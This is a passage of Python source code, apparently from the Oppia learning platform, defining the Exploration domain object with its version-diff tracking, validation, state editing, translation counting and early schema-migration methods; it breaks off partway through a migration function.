'Expected version to be an int, received %s' % self.version)
class ExplorationVersionsDiff(python_utils.OBJECT):
"""Domain object for the difference between two versions of an Oppia
exploration.
Attributes:
added_state_names: list(str). Name of the states added to the
exploration from prev_exp_version to current_exp_version.
deleted_state_names: list(str). Name of the states deleted from the
exploration from prev_exp_version to current_exp_version.
new_to_old_state_names: dict. Dictionary mapping state names of
current_exp_version to the state names of prev_exp_version.
old_to_new_state_names: dict. Dictionary mapping state names of
prev_exp_version to the state names of current_exp_version.
"""
def __init__(self, change_list):
"""Constructs an ExplorationVersionsDiff domain object.
Args:
change_list: list(ExplorationChange). A list of all of the commit
cmds from the old version of the exploration up to the next
version.
"""
added_state_names = []
deleted_state_names = []
new_to_old_state_names = {}
for change in change_list:
if change.cmd == CMD_ADD_STATE:
added_state_names.append(change.state_name)
elif change.cmd == CMD_DELETE_STATE:
state_name = change.state_name
if state_name in added_state_names:
added_state_names.remove(state_name)
else:
original_state_name = state_name
if original_state_name in new_to_old_state_names:
original_state_name = new_to_old_state_names.pop(
original_state_name)
deleted_state_names.append(original_state_name)
elif change.cmd == CMD_RENAME_STATE:
old_state_name = change.old_state_name
new_state_name = change.new_state_name
if old_state_name in added_state_names:
added_state_names.remove(old_state_name)
added_state_names.append(new_state_name)
elif old_state_name in new_to_old_state_names:
new_to_old_state_names[new_state_name] = (
new_to_old_state_names.pop(old_state_name))
else:
new_to_old_state_names[new_state_name] = old_state_name
self.added_state_names = added_state_names
self.deleted_state_names = deleted_state_names
self.new_to_old_state_names = new_to_old_state_names
self.old_to_new_state_names = {
value: key for key, value in new_to_old_state_names.items()
}
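    # Illustrative sketch of the rename tracking above (made-up state names):
    # for a change list that renames 'Intro' to 'Start' and then 'Start' to
    # 'Begin', new_to_old_state_names ends up as {'Begin': 'Intro'} and
    # old_to_new_state_names as {'Intro': 'Begin'}. A state that is added and
    # later deleted within the same change list appears in neither
    # added_state_names nor deleted_state_names.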
class Exploration(python_utils.OBJECT):
"""Domain object for an Oppia exploration."""
def __init__(
self, exploration_id, title, category, objective,
language_code, tags, blurb, author_notes,
states_schema_version, init_state_name, states_dict,
param_specs_dict, param_changes_list, version,
auto_tts_enabled, correctness_feedback_enabled,
created_on=None, last_updated=None):
"""Initializes an Exploration domain object.
Args:
exploration_id: str. The exploration id.
title: str. The exploration title.
category: str. The category of the exploration.
objective: str. The objective of the exploration.
language_code: str. The language code of the exploration.
tags: list(str). The tags given to the exploration.
blurb: str. The blurb of the exploration.
author_notes: str. The author notes.
            states_schema_version: int. The schema version of the exploration.
init_state_name: str. The name for the initial state of the
exploration.
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
            param_specs_dict: dict. A dict where each key-value pair
                represents, respectively, a param spec name and a dict used
                to initialize a ParamSpec domain object.
param_changes_list: list(dict). List of dict where each dict is
used to initialize a ParamChange domain object.
version: int. The version of the exploration.
auto_tts_enabled: bool. True if automatic text-to-speech is
enabled.
correctness_feedback_enabled: bool. True if correctness feedback is
enabled.
created_on: datetime.datetime. Date and time when the exploration
is created.
last_updated: datetime.datetime. Date and time when the exploration
was last updated.
"""
self.id = exploration_id
self.title = title
self.category = category
self.objective = objective
self.language_code = language_code
self.tags = tags
self.blurb = blurb
self.author_notes = author_notes
self.states_schema_version = states_schema_version
self.init_state_name = init_state_name
self.states = {}
for (state_name, state_dict) in states_dict.items():
self.states[state_name] = state_domain.State.from_dict(state_dict)
self.param_specs = {
ps_name: param_domain.ParamSpec.from_dict(ps_val)
for (ps_name, ps_val) in param_specs_dict.items()
}
self.param_changes = [
param_domain.ParamChange.from_dict(param_change_dict)
for param_change_dict in param_changes_list]
self.version = version
self.created_on = created_on
self.last_updated = last_updated
self.auto_tts_enabled = auto_tts_enabled
self.correctness_feedback_enabled = correctness_feedback_enabled
@classmethod
def create_default_exploration(
cls, exploration_id, title=feconf.DEFAULT_EXPLORATION_TITLE,
init_state_name=feconf.DEFAULT_INIT_STATE_NAME,
category=feconf.DEFAULT_EXPLORATION_CATEGORY,
objective=feconf.DEFAULT_EXPLORATION_OBJECTIVE,
language_code=constants.DEFAULT_LANGUAGE_CODE):
"""Returns a Exploration domain object with default values.
'title', 'init_state_name', 'category', 'objective' if not provided are
taken from feconf; 'tags' and 'param_changes_list' are initialized to
empty list; 'states_schema_version' is taken from feconf; 'states_dict'
is derived from feconf; 'param_specs_dict' is an empty dict; 'blurb' and
'author_notes' are initialized to empty string; 'version' is
initializated to 0.
Args:
exploration_id: str. The id of the exploration.
title: str. The exploration title.
init_state_name: str. The name of the initial state.
category: str. The category of the exploration.
objective: str. The objective of the exploration.
language_code: str. The language code of the exploration.
Returns:
Exploration. The Exploration domain object with default
values.
"""
init_state_dict = state_domain.State.create_default_state(
init_state_name, is_initial_state=True).to_dict()
states_dict = {
init_state_name: init_state_dict
}
return cls(
exploration_id, title, category, objective, language_code, [], '',
'', feconf.CURRENT_STATE_SCHEMA_VERSION,
init_state_name, states_dict, {}, [], 0,
feconf.DEFAULT_AUTO_TTS_ENABLED, False)
@classmethod
def from_dict(
cls, exploration_dict,
exploration_version=0, exploration_created_on=None,
exploration_last_updated=None):
"""Return a Exploration domain object from a dict.
Args:
exploration_dict: dict. The dict representation of Exploration
object.
exploration_version: int. The version of the exploration.
exploration_created_on: datetime.datetime. Date and time when the
exploration is created.
exploration_last_updated: datetime.datetime. Date and time when the
exploration was last updated.
Returns:
Exploration. The corresponding Exploration domain object.
"""
        # NOTE TO DEVELOPERS: It is absolutely ESSENTIAL that this conversion
        # to and from an ExplorationModel/dictionary be exhaustive and
        # complete.
exploration = cls.create_default_exploration(
exploration_dict['id'],
title=exploration_dict['title'],
category=exploration_dict['category'],
objective=exploration_dict['objective'],
language_code=exploration_dict['language_code'])
exploration.tags = exploration_dict['tags']
exploration.blurb = exploration_dict['blurb']
exploration.author_notes = exploration_dict['author_notes']
exploration.auto_tts_enabled = exploration_dict['auto_tts_enabled']
exploration.correctness_feedback_enabled = exploration_dict[
'correctness_feedback_enabled']
exploration.param_specs = {
ps_name: param_domain.ParamSpec.from_dict(ps_val) for
(ps_name, ps_val) in exploration_dict['param_specs'].items()
}
exploration.states_schema_version = exploration_dict[
'states_schema_version']
init_state_name = exploration_dict['init_state_name']
exploration.rename_state(exploration.init_state_name, init_state_name)
exploration.add_states([
state_name for state_name in exploration_dict['states']
if state_name != init_state_name])
for (state_name, sdict) in exploration_dict['states'].items():
state = exploration.states[state_name]
state.content = state_domain.SubtitledHtml(
sdict['content']['content_id'], sdict['content']['html'])
state.param_changes = [param_domain.ParamChange(
pc['name'], pc['generator_id'], pc['customization_args']
) for pc in sdict['param_changes']]
for pc in state.param_changes:
if pc.name not in exploration.param_specs:
raise Exception('Parameter %s was used in a state but not '
'declared in the exploration param_specs.'
% pc.name)
idict = sdict['interaction']
interaction_answer_groups = [
state_domain.AnswerGroup.from_dict(group)
for group in idict['answer_groups']]
default_outcome = (
state_domain.Outcome.from_dict(idict['default_outcome'])
if idict['default_outcome'] is not None else None)
solution = (
state_domain.Solution.from_dict(idict['id'], idict['solution'])
if idict['solution'] else None)
state.interaction = state_domain.InteractionInstance(
idict['id'], idict['customization_args'],
interaction_answer_groups, default_outcome,
idict['confirmed_unclassified_answers'],
[state_domain.Hint.from_dict(h) for h in idict['hints']],
solution)
state.recorded_voiceovers = (
state_domain.RecordedVoiceovers.from_dict(
sdict['recorded_voiceovers']))
state.written_translations = (
state_domain.WrittenTranslations.from_dict(
sdict['written_translations']))
state.solicit_answer_details = sdict['solicit_answer_details']
exploration.states[state_name] = state
exploration.param_changes = [
param_domain.ParamChange.from_dict(pc)
for pc in exploration_dict['param_changes']]
exploration.version = exploration_version
exploration.created_on = exploration_created_on
exploration.last_updated = exploration_last_updated
return exploration
@classmethod
def _validate_state_name(cls, name):
"""Validates name string.
Args:
name: str. The name to validate.
"""
utils.require_valid_name(name, 'a state name')
def validate(self, strict=False):
"""Validates various properties of the Exploration.
Args:
strict: bool. If True, the exploration is assumed to be published,
and the validation checks are stricter.
Raises:
ValidationError: One or more attributes of the Exploration are
invalid.
"""
if not isinstance(self.title, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected title to be a string, received %s' % self.title)
utils.require_valid_name(
self.title, 'the exploration title', allow_empty=True)
if not isinstance(self.category, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected category to be a string, received %s'
% self.category)
utils.require_valid_name(
self.category, 'the exploration category', allow_empty=True)
if not isinstance(self.objective, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected objective to be a string, received %s' %
self.objective)
if not isinstance(self.language_code, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected language_code to be a string, received %s' %
self.language_code)
if not utils.is_valid_language_code(self.language_code):
raise utils.ValidationError(
'Invalid language_code: %s' % self.language_code)
if not isinstance(self.tags, list):
raise utils.ValidationError(
'Expected \'tags\' to be a list, received %s' % self.tags)
for tag in self.tags:
if not isinstance(tag, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected each tag in \'tags\' to be a string, received '
'\'%s\'' % tag)
if not tag:
raise utils.ValidationError('Tags should be non-empty.')
if not re.match(constants.TAG_REGEX, tag):
raise utils.ValidationError(
'Tags should only contain lowercase letters and spaces, '
'received \'%s\'' % tag)
if (tag[0] not in string.ascii_lowercase or
tag[-1] not in string.ascii_lowercase):
raise utils.ValidationError(
                    'Tags should not start or end with whitespace, received '
                    '\'%s\'' % tag)
if re.search(r'\s\s+', tag):
raise utils.ValidationError(
'Adjacent whitespace in tags should be collapsed, '
'received \'%s\'' % tag)
if len(set(self.tags)) != len(self.tags):
raise utils.ValidationError('Some tags duplicate each other')
if not isinstance(self.blurb, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected blurb to be a string, received %s' % self.blurb)
if not isinstance(self.author_notes, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected author_notes to be a string, received %s' %
self.author_notes)
if not isinstance(self.states, dict):
raise utils.ValidationError(
'Expected states to be a dict, received %s' % self.states)
if not self.states:
raise utils.ValidationError('This exploration has no states.')
for state_name in self.states:
self._validate_state_name(state_name)
state = self.states[state_name]
state.validate(
self.param_specs,
allow_null_interaction=not strict)
# The checks below perform validation on the Outcome domain object
# that is specific to answer groups in explorations, but not
# questions. This logic is here because the validation checks in
# the Outcome domain object are used by both explorations and
# questions.
for answer_group in state.interaction.answer_groups:
if not answer_group.outcome.dest:
raise utils.ValidationError(
'Every outcome should have a destination.')
if not isinstance(
answer_group.outcome.dest, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected outcome dest to be a string, received %s'
% answer_group.outcome.dest)
if state.interaction.default_outcome is not None:
if not state.interaction.default_outcome.dest:
raise utils.ValidationError(
'Every outcome should have a destination.')
if not isinstance(
state.interaction.default_outcome.dest,
python_utils.BASESTRING):
raise utils.ValidationError(
'Expected outcome dest to be a string, received %s'
% state.interaction.default_outcome.dest)
if self.states_schema_version is None:
raise utils.ValidationError(
'This exploration has no states schema version.')
if not self.init_state_name:
raise utils.ValidationError(
'This exploration has no initial state name specified.')
if self.init_state_name not in self.states:
raise utils.ValidationError(
'There is no state in %s corresponding to the exploration\'s '
'initial state name %s.' %
(list(self.states.keys()), self.init_state_name))
if not isinstance(self.param_specs, dict):
raise utils.ValidationError(
'Expected param_specs to be a dict, received %s'
% self.param_specs)
if not isinstance(self.auto_tts_enabled, bool):
raise utils.ValidationError(
'Expected auto_tts_enabled to be a bool, received %s'
% self.auto_tts_enabled)
if not isinstance(self.correctness_feedback_enabled, bool):
raise utils.ValidationError(
'Expected correctness_feedback_enabled to be a bool, received '
'%s' % self.correctness_feedback_enabled)
for param_name in self.param_specs:
if not isinstance(param_name, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected parameter name to be a string, received %s (%s).'
% (param_name, type(param_name)))
if not re.match(feconf.ALPHANUMERIC_REGEX, param_name):
raise utils.ValidationError(
'Only parameter names with characters in [a-zA-Z0-9] are '
'accepted.')
self.param_specs[param_name].validate()
if not isinstance(self.param_changes, list):
raise utils.ValidationError(
'Expected param_changes to be a list, received %s'
% self.param_changes)
for param_change in self.param_changes:
param_change.validate()
if param_change.name in constants.INVALID_PARAMETER_NAMES:
raise utils.ValidationError(
'The exploration-level parameter with name \'%s\' is '
'reserved. Please choose a different name.'
% param_change.name)
if param_change.name not in self.param_specs:
raise utils.ValidationError(
'No parameter named \'%s\' exists in this exploration'
% param_change.name)
# TODO(sll): Find a way to verify the param change customization args
# when they depend on exploration/state parameters (e.g. the generated
# values must have the correct obj_type). Can we get sample values for
# the reader's answer and these parameters by looking at states that
# link to this one?
# Check that all state param changes are valid.
for state_name, state in self.states.items():
for param_change in state.param_changes:
param_change.validate()
if param_change.name in constants.INVALID_PARAMETER_NAMES:
raise utils.ValidationError(
'The parameter name \'%s\' is reserved. Please choose '
'a different name for the parameter being set in '
'state \'%s\'.' % (param_change.name, state_name))
if param_change.name not in self.param_specs:
raise utils.ValidationError(
'The parameter with name \'%s\' was set in state '
'\'%s\', but it does not exist in the list of '
'parameter specifications for this exploration.'
% (param_change.name, state_name))
# Check that all answer groups, outcomes, and param_changes are valid.
all_state_names = list(self.states.keys())
for state_name, state in self.states.items():
interaction = state.interaction
default_outcome = interaction.default_outcome
if default_outcome is not None:
# Check the default destination, if any.
if default_outcome.dest not in all_state_names:
raise utils.ValidationError(
'The destination %s is not a valid state.'
% default_outcome.dest)
# Check that, if the outcome is a non-self-loop, then the
# refresher_exploration_id is None.
if (default_outcome.refresher_exploration_id is not None and
default_outcome.dest != state_name):
raise utils.ValidationError(
'The default outcome for state %s has a refresher '
'exploration ID, but is not a self-loop.' % state_name)
for group in interaction.answer_groups:
# Check group destinations.
if group.outcome.dest not in all_state_names:
raise utils.ValidationError(
'The destination %s is not a valid state.'
% group.outcome.dest)
# Check that, if the outcome is a non-self-loop, then the
# refresher_exploration_id is None.
if (group.outcome.refresher_exploration_id is not None and
group.outcome.dest != state_name):
raise utils.ValidationError(
'The outcome for an answer group in state %s has a '
'refresher exploration ID, but is not a self-loop.'
% state_name)
for param_change in group.outcome.param_changes:
if param_change.name not in self.param_specs:
raise utils.ValidationError(
'The parameter %s was used in an answer group, '
'but it does not exist in this exploration'
% param_change.name)
if strict:
warnings_list = []
try:
self._verify_all_states_reachable()
except utils.ValidationError as e:
warnings_list.append(python_utils.UNICODE(e))
try:
self._verify_no_dead_ends()
except utils.ValidationError as e:
warnings_list.append(python_utils.UNICODE(e))
if not self.title:
warnings_list.append(
'A title must be specified (in the \'Settings\' tab).')
if not self.category:
warnings_list.append(
'A category must be specified (in the \'Settings\' tab).')
if not self.objective:
warnings_list.append(
'An objective must be specified (in the \'Settings\' tab).'
)
# Check that self-loop outcomes are not labelled as correct.
all_state_names = list(self.states.keys())
for state_name, state in self.states.items():
interaction = state.interaction
default_outcome = interaction.default_outcome
if default_outcome is not None:
# Check that, if the outcome is a self-loop, then the
# outcome is not labelled as correct.
if (default_outcome.dest == state_name and
default_outcome.labelled_as_correct):
raise utils.ValidationError(
'The default outcome for state %s is labelled '
'correct but is a self-loop.' % state_name)
for group in interaction.answer_groups:
# Check that, if the outcome is a self-loop, then the
# outcome is not labelled as correct.
if (group.outcome.dest == state_name and
group.outcome.labelled_as_correct):
raise utils.ValidationError(
'The outcome for an answer group in state %s is '
'labelled correct but is a self-loop.' % state_name)
if len(warnings_list) > 0:
warning_str = ''
for ind, warning in enumerate(warnings_list):
warning_str += '%s. %s ' % (ind + 1, warning)
raise utils.ValidationError(
'Please fix the following issues before saving this '
'exploration: %s' % warning_str)
def _verify_all_states_reachable(self):
"""Verifies that all states are reachable from the initial state.
Raises:
ValidationError: One or more states are not reachable from the
initial state of the Exploration.
"""
# This queue stores state names.
processed_queue = []
curr_queue = [self.init_state_name]
while curr_queue:
curr_state_name = curr_queue[0]
curr_queue = curr_queue[1:]
            if curr_state_name not in processed_queue:
processed_queue.append(curr_state_name)
curr_state = self.states[curr_state_name]
if not curr_state.interaction.is_terminal:
all_outcomes = curr_state.interaction.get_all_outcomes()
for outcome in all_outcomes:
dest_state = outcome.dest
if (dest_state not in curr_queue and
dest_state not in processed_queue):
curr_queue.append(dest_state)
if len(self.states) != len(processed_queue):
unseen_states = list(
set(self.states.keys()) - set(processed_queue))
raise utils.ValidationError(
'The following states are not reachable from the initial '
'state: %s' % ', '.join(unseen_states))
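    # Illustrative sketch of the check above (made-up state names): if the
    # exploration has states Intro (initial), Middle and Orphan, with
    # outcomes Intro -> Middle only, the breadth-first traversal starting at
    # Intro never reaches Orphan, so a ValidationError listing 'Orphan' is
    # raised.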
def _verify_no_dead_ends(self):
"""Verifies that all states can reach a terminal state.
Raises:
            ValidationError: If it is impossible to complete the exploration
                from a state.
"""
# This queue stores state names.
processed_queue = []
curr_queue = []
for (state_name, state) in self.states.items():
if state.interaction.is_terminal:
curr_queue.append(state_name)
while curr_queue:
curr_state_name = curr_queue[0]
curr_queue = curr_queue[1:]
            if curr_state_name not in processed_queue:
processed_queue.append(curr_state_name)
for (state_name, state) in self.states.items():
if (state_name not in curr_queue
and state_name not in processed_queue):
all_outcomes = (
state.interaction.get_all_outcomes())
for outcome in all_outcomes:
if outcome.dest == curr_state_name:
curr_queue.append(state_name)
break
if len(self.states) != len(processed_queue):
dead_end_states = list(
set(self.states.keys()) - set(processed_queue))
raise utils.ValidationError(
'It is impossible to complete the exploration from the '
'following states: %s' % ', '.join(dead_end_states))
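    # Illustrative sketch of the check above (made-up state names): for a
    # graph Intro -> Middle -> End where End is terminal, the reverse
    # traversal seeds curr_queue with ['End'] and then pulls in 'Middle' and
    # 'Intro', since each has an outcome that eventually leads to a terminal
    # state. A state whose outcomes only loop back to itself would be
    # reported as a dead end.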
def get_content_html(self, state_name, content_id):
"""Return the content for a given content id of a state.
Args:
state_name: str. The name of the state.
content_id: str. The id of the content.
Returns:
str. The html content corresponding to the given content id of a
state.
Raises:
ValueError: The given state_name does not exist.
"""
if state_name not in self.states:
raise ValueError('State %s does not exist' % state_name)
return self.states[state_name].get_content_html(content_id)
# Derived attributes of an exploration.
@property
def init_state(self):
"""The state which forms the start of this exploration.
Returns:
State. The corresponding State domain object.
"""
return self.states[self.init_state_name]
@property
def param_specs_dict(self):
"""A dict of param specs, each represented as Python dicts.
Returns:
dict. Dict of parameter specs.
"""
return {ps_name: ps_val.to_dict()
for (ps_name, ps_val) in self.param_specs.items()}
@property
def param_change_dicts(self):
"""A list of param changes, represented as JSONifiable Python dicts.
Returns:
list(dict). List of dicts, each representing a parameter change.
"""
return [param_change.to_dict() for param_change in self.param_changes]
@classmethod
def is_demo_exploration_id(cls, exploration_id):
"""Whether the given exploration id is a demo exploration.
Args:
exploration_id: str. The exploration id.
Returns:
bool. Whether the corresponding exploration is a demo exploration.
"""
return exploration_id in feconf.DEMO_EXPLORATIONS
@property
def is_demo(self):
"""Whether the exploration is one of the demo explorations.
Returns:
            bool. True if the current exploration is a demo exploration.
"""
return self.is_demo_exploration_id(self.id)
def has_state_name(self, state_name):
"""Whether the exploration has a state with the given state name.
Args:
state_name: str. The name of the state.
Returns:
            bool. True if the exploration has a state with the given name.
"""
state_names = list(self.states.keys())
return state_name in state_names
def get_interaction_id_by_state_name(self, state_name):
"""Returns the interaction id of the state.
Args:
state_name: str. The name of the state.
Returns:
str or None. The ID of the interaction.
"""
return self.states[state_name].interaction.id
def update_title(self, title):
"""Update the exploration title.
Args:
title: str. The exploration title to set.
"""
self.title = title
def update_category(self, category):
"""Update the exploration category.
Args:
category: str. The exploration category to set.
"""
self.category = category
def update_objective(self, objective):
"""Update the exploration objective.
Args:
objective: str. The exploration objective to set.
"""
self.objective = objective
def update_language_code(self, language_code):
"""Update the exploration language code.
Args:
language_code: str. The exploration language code to set.
"""
self.language_code = language_code
def update_tags(self, tags):
"""Update the tags of the exploration.
Args:
tags: list(str). List of tags to set.
"""
self.tags = tags
def update_blurb(self, blurb):
"""Update the blurb of the exploration.
Args:
blurb: str. The blurb to set.
"""
self.blurb = blurb
def update_author_notes(self, author_notes):
"""Update the author notes of the exploration.
Args:
author_notes: str. The author notes to set.
"""
self.author_notes = author_notes
def update_param_specs(self, param_specs_dict):
"""Update the param spec dict.
Args:
param_specs_dict: dict. A dict where each key-value pair represents
respectively, a param spec name and a dict used to initialize a
ParamSpec domain object.
"""
self.param_specs = {
ps_name: param_domain.ParamSpec.from_dict(ps_val)
for (ps_name, ps_val) in param_specs_dict.items()
}
def update_param_changes(self, param_changes):
"""Update the param change dict.
Args:
param_changes: list(ParamChange). List of ParamChange objects.
"""
self.param_changes = param_changes
def update_init_state_name(self, init_state_name):
"""Update the name for the initial state of the exploration.
Args:
init_state_name: str. The new name of the initial state.
"""
if init_state_name not in self.states:
raise Exception(
'Invalid new initial state name: %s; '
'it is not in the list of states %s for this '
'exploration.' % (init_state_name, list(self.states.keys())))
self.init_state_name = init_state_name
def update_auto_tts_enabled(self, auto_tts_enabled):
"""Update whether automatic text-to-speech is enabled.
Args:
auto_tts_enabled: bool. Whether automatic text-to-speech
is enabled or not.
"""
self.auto_tts_enabled = auto_tts_enabled
def update_correctness_feedback_enabled(self, correctness_feedback_enabled):
"""Update whether correctness feedback is enabled.
Args:
correctness_feedback_enabled: bool. Whether correctness feedback
is enabled or not.
"""
self.correctness_feedback_enabled = correctness_feedback_enabled
# Methods relating to states.
def add_states(self, state_names):
"""Adds multiple states to the exploration.
Args:
state_names: list(str). List of state names to add.
Raises:
ValueError: At least one of the new state names already exists in
the states dict.
"""
for state_name in state_names:
if state_name in self.states:
raise ValueError('Duplicate state name %s' % state_name)
for state_name in state_names:
self.states[state_name] = state_domain.State.create_default_state(
state_name)
def rename_state(self, old_state_name, new_state_name):
"""Renames the given state.
Args:
old_state_name: str. The old name of state to rename.
new_state_name: str. The new state name.
Raises:
ValueError: The old state name does not exist or the new state name
is already in states dict.
"""
if old_state_name not in self.states:
raise ValueError('State %s does not exist' % old_state_name)
if (old_state_name != new_state_name and
new_state_name in self.states):
raise ValueError('Duplicate state name: %s' % new_state_name)
if old_state_name == new_state_name:
return
self._validate_state_name(new_state_name)
self.states[new_state_name] = copy.deepcopy(
self.states[old_state_name])
del self.states[old_state_name]
if self.init_state_name == old_state_name:
self.update_init_state_name(new_state_name)
# Find all destinations in the exploration which equal the renamed
# state, and change the name appropriately.
for other_state_name in self.states:
other_state = self.states[other_state_name]
other_outcomes = other_state.interaction.get_all_outcomes()
for outcome in other_outcomes:
if outcome.dest == old_state_name:
outcome.dest = new_state_name
def delete_state(self, state_name):
"""Deletes the given state.
Args:
state_name: str. The state name to be deleted.
Raises:
ValueError: The state does not exist or is the initial state of the
exploration.
"""
if state_name not in self.states:
raise ValueError('State %s does not exist' % state_name)
# Do not allow deletion of initial states.
if self.init_state_name == state_name:
raise ValueError('Cannot delete initial state of an exploration.')
# Find all destinations in the exploration which equal the deleted
# state, and change them to loop back to their containing state.
for other_state_name in self.states:
other_state = self.states[other_state_name]
all_outcomes = other_state.interaction.get_all_outcomes()
for outcome in all_outcomes:
if outcome.dest == state_name:
outcome.dest = other_state_name
del self.states[state_name]
def get_translatable_text(self, language_code):
"""Returns all the contents which needs translation in the given
language.
Args:
language_code: str. The language code in which translation is
required.
Returns:
dict(str, dict(str, str)). A dict where state_name is the key and a
dict with content_id as the key and html content as value.
"""
state_names_to_content_id_mapping = {}
for state_name, state in self.states.items():
state_names_to_content_id_mapping[state_name] = (
state.get_content_id_mapping_needing_translations(
language_code))
return state_names_to_content_id_mapping
def get_trainable_states_dict(self, old_states, exp_versions_diff):
"""Retrieves the state names of all trainable states in an exploration
segregated into state names with changed and unchanged answer groups.
In this method, the new_state_name refers to the name of the state in
the current version of the exploration whereas the old_state_name refers
to the name of the state in the previous version of the exploration.
Args:
old_states: dict. Dictionary containing all State domain objects.
exp_versions_diff: ExplorationVersionsDiff. An instance of the
exploration versions diff class.
Returns:
            dict. The trainable states dict. This dict has two keys
                representing state names with changed answer groups and
                unchanged answer groups, respectively.
"""
trainable_states_dict = {
'state_names_with_changed_answer_groups': [],
'state_names_with_unchanged_answer_groups': []
}
new_states = self.states
for new_state_name in new_states:
new_state = new_states[new_state_name]
if not new_state.can_undergo_classification():
continue
old_state_name = new_state_name
if new_state_name in exp_versions_diff.new_to_old_state_names:
old_state_name = exp_versions_diff.new_to_old_state_names[
new_state_name]
# The case where a new state is added. When this happens, the
# old_state_name will be equal to the new_state_name and it will not
# be present in the exploration's older version.
if old_state_name not in old_states:
trainable_states_dict[
'state_names_with_changed_answer_groups'].append(
new_state_name)
continue
old_state = old_states[old_state_name]
old_training_data = old_state.get_training_data()
new_training_data = new_state.get_training_data()
# Check if the training data and interaction_id of the state in the
# previous version of the exploration and the state in the new
# version of the exploration match. If any of them are not equal,
# we create a new job for the state in the current version.
if new_training_data == old_training_data and (
new_state.interaction.id == old_state.interaction.id):
trainable_states_dict[
'state_names_with_unchanged_answer_groups'].append(
new_state_name)
else:
trainable_states_dict[
'state_names_with_changed_answer_groups'].append(
new_state_name)
return trainable_states_dict
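    # Illustrative sketch of the returned value (hypothetical state names):
    #
    #     {
    #         'state_names_with_changed_answer_groups': ['NewState'],
    #         'state_names_with_unchanged_answer_groups': ['Intro']
    #     }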
def get_languages_with_complete_translation(self):
"""Returns a list of language code in which the exploration translation
is 100%.
Return:
list(str). A list of language code in which the translation for the
exploration is complete i.e, 100%.
"""
content_count = self.get_content_count()
language_code_list = []
for language_code, count in self.get_translation_counts().items():
if count == content_count:
language_code_list.append(language_code)
return language_code_list
def get_translation_counts(self):
"""Returns a dict representing the number of translations available in a
language for which there exists at least one translation in the
exploration.
Returns:
dict(str, int). A dict with language code as a key and number of
translation available in that language as the value.
"""
exploration_translation_counts = collections.defaultdict(int)
for state in self.states.values():
state_translation_counts = state.get_translation_counts()
for language, count in state_translation_counts.items():
exploration_translation_counts[language] += count
return dict(exploration_translation_counts)
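    # Illustrative sketch (hypothetical counts): an exploration with three
    # Hindi translations and one French translation across all of its states
    # would yield {'hi': 3, 'fr': 1}.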
def get_content_count(self):
"""Returns the total number of distinct content fields available in the
exploration which are user facing and can be translated into
different languages.
(The content field includes state content, feedback, hints, solutions.)
Return:
int. The total number of distinct content fields available inside
the exploration.
"""
content_count = 0
for state in self.states.values():
content_count += state.get_content_count()
return content_count
@classmethod
def _convert_states_v0_dict_to_v1_dict(cls, states_dict):
"""Converts old states schema to the modern v1 schema. v1 contains the
schema version 1 and does not contain any old constructs, such as
widgets. This is a complete migration of everything previous to the
schema versioning update to the earliest versioned schema.
Note that the states_dict being passed in is modified in-place.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
# Ensure widgets are renamed to be interactions.
for _, state_defn in states_dict.items():
if 'widget' not in state_defn:
continue
state_defn['interaction'] = copy.deepcopy(state_defn['widget'])
state_defn['interaction']['id'] = copy.deepcopy(
state_defn['interaction']['widget_id'])
del state_defn['interaction']['widget_id']
if 'sticky' in state_defn['interaction']:
del state_defn['interaction']['sticky']
del state_defn['widget']
return states_dict
@classmethod
def _convert_states_v1_dict_to_v2_dict(cls, states_dict):
"""Converts from version 1 to 2. Version 1 assumes the existence of an
implicit 'END' state, but version 2 does not. As a result, the
conversion process involves introducing a proper ending state for all
explorations previously designed under this assumption.
Note that the states_dict being passed in is modified in-place.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
# The name of the implicit END state before the migration. Needed here
# to migrate old explorations which expect that implicit END state.
old_end_dest = 'END'
# Adds an explicit state called 'END' with an EndExploration to replace
# links other states have to an implicit 'END' state. Otherwise, if no
# states refer to a state called 'END', no new state will be introduced
# since it would be isolated from all other states in the graph and
# create additional warnings for the user. If they were not referring
# to an 'END' state before, then they would only be receiving warnings
# about not being able to complete the exploration. The introduction of
# a real END state would produce additional warnings (state cannot be
# reached from other states, etc.).
targets_end_state = False
has_end_state = False
for (state_name, sdict) in states_dict.items():
if not has_end_state and state_name == old_end_dest:
has_end_state = True
if not targets_end_state:
for handler in sdict['interaction']['handlers']:
for rule_spec in handler['rule_specs']:
if rule_spec['dest'] == old_end_dest:
targets_end_state = True
break
        # Ensure any exploration pointing to an END state has a valid END
        # state to end with (in case it expects an END state).
if targets_end_state and not has_end_state:
states_dict[old_end_dest] = {
'content': [{
'type': 'text',
'value': 'Congratulations, you have finished!'
}],
'interaction': {
'id': 'EndExploration',
'customization_args': {
'recommendedExplorationIds': {
'value': []
}
},
'handlers': [{
'name': 'submit',
'rule_specs': [{
'definition': {
'rule_type': 'default'
},
'dest': old_end_dest,
'feedback': [],
'param_changes': []
}]
}],
},
'param_changes': []
}
return states_dict
@classmethod
def _convert_states_v2_dict_to_v3_dict(cls, states_dict):
"""Converts from version 2 to 3. Version 3 introduces a triggers list
within interactions.
Note that the states_dict being passed in is modified in-place.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
        # Ensure all state interactions have a triggers list.
for sdict in states_dict.values():
interaction = sdict['interaction']
if 'triggers' not in interaction:
interaction['triggers'] = []
return states_dict
@classmethod
def _convert_states_v3_dict_to_v4_dict(cls, states_dict):
"""Converts from version 3 to 4. Version 4 introduces a new structure
for rules by organizing them into answer groups instead of handlers.
This migration involves a 1:1 mapping from rule specs to answer groups
containing just that single rule. Default rules have their destination
state name and feedback copied to the default_outcome portion of an
interaction instance.
Note that the states_dict being passed in is modified in-place.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
interaction = state_dict['interaction']
answer_groups = []
